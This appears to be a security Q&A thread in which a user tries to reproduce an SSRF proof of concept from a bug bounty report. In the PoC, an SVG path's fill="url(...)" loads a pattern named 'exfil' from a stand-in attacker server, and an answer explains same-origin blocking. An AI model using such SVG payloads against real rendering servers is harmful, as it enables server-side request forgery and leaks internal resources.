# SSRF PoC using fill="url(...)" with absolute path

Tags: ssrf

I read [this](https://hackerone.com/reports/265050) interesting report which describes a SSRF vulnerability allowing to fetch internal images by using the url property in a path element. However, even though this vulnerability most likely relies on the server rendering the image, I haven't been able to reproduce the way in which this was accomplished via  a simple HTML document.

From what I understand, a path element was used to call external svg elements under the control of the attacker:

```
<path fill="url(https://yourserver.com/poc.svg#exfil)" stroke="#a1a1a1"
```

where `poc.svg` contains this:

```
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<defs>
    <pattern id="exfil" width="512" height="512" patternUnits="userSpaceOnUse">
        <image xlink:href="<redacted>" x="0" y="0" height="256px" width="256px"/>
    </pattern>
</defs>
</svg>
```

I suppose the `<redacted>` part is pointing to an image in the vulnerable server. I believe `<pattern id="exfil">` is important because many svg elements require that kind of identifier (`id`) as they reference other elements in the same document. However, I haven't been able to replicate this pattern with the "fill" parameter.

This is basically what I'm doing:

```
<html>
    <body>
        <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
            <path fill="url(otherpoc.svg#exfil)" d="M150 0 L75 200 L225 200 Z" />
        </svg>
    </body>

</html>
```

and otherpoc.svg:

```
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<defs>
    <pattern id="exfil" width="512" height="512" patternUnits="userSpaceOnUse">
        <image xlink:href="google.png" x="0" y="0" height="256px" width="256px"/>
    </pattern>
</defs>
</svg>
```

Now, this works correctly. If I had a google.png file as a local resource, then that would be fetched as intended. However, absolute paths (as in `<path fill="url(http://server.com/otherpoc.svg#exfil)"`) don't seem to work (the url is not resolved). If you want to test this, remember to use Firefox or other browsing allowing this type of URL resolution.

I would appreciate any help.

Answer (score 1):

You're trying to reproduce this vulnerability in your browser while the affected server used a different (unnamed) SVG parser with different behavior.

Your browser simply denies to load the pattern linked via `<path fill="url(...)" ...>` cross-domain because that would be an [SOP](https://en.wikipedia.org/wiki/Same-origin_policy) violation. If referencing elements inside SVG files hosted on different domains was allowed, this could potentially be used by an attacker to extract information.

So, using your example, Firefox rightfully raises:

```
Security Error: Content at http://localhost/svgsop.html may not load data from http://server.com/otherpoc.svg.
```

Comment: Thank you for your response. It is interesting you're seeing that message because in Firefox 54 (64 bits, Linux), I don't see any warning. The request is simply not being generated. I also think it is quite a bit more complex than you what you're describing: svg elements have different SOP's depending on how it is embedded (as image, via object, inline, etc) and some parameters are allowed to retrieve external resources (e.g. `<image xlink:href="http://..."`, `<path mask="url(http://...`), that's why historically mask, fill, clip-path, filter have been used for data exfiltration.

Comment: @RobertSmith The error might only be visible in the browser ("chrome") console (Ctrl+Shift+J), and doesn't require any request to be issued. And yeah, embedding remote images is obviously fine, but referencing remote SVG elements is not.

Comment: Oh, I was referring to your last paragraph about Firefox. Chrome doesn't fetch anything and also doesn't show any errors with fill. However, filter="url(... ) shows a cross origin error. What about "mask"? Can you retrieve external resources with that?

Comment: By the way, embedding remote images can also be tricky because it is done via `<image xlink:href` which is part of the SVG specification, not based on the `<img>` tag.

Comment: @RobertSmith I wasn't referring to Google Chrome the browser, but the browser console inside Firefox. See [chrome](https://developer.mozilla.org/en-US/docs/Glossary/Chrome).

Comment: Understood. Yes, I see the message "Security Error: Content at http://localhost:8000/ may not load data from <URL>", but this occurs even  when the image is successfully retrieved and used in the path element (e.g. `<path mask="url(http://...`). I think the error message should be `Cross-Origin Request Blocked: The Same Origin Policy disallows reading the remote resource at <URL>`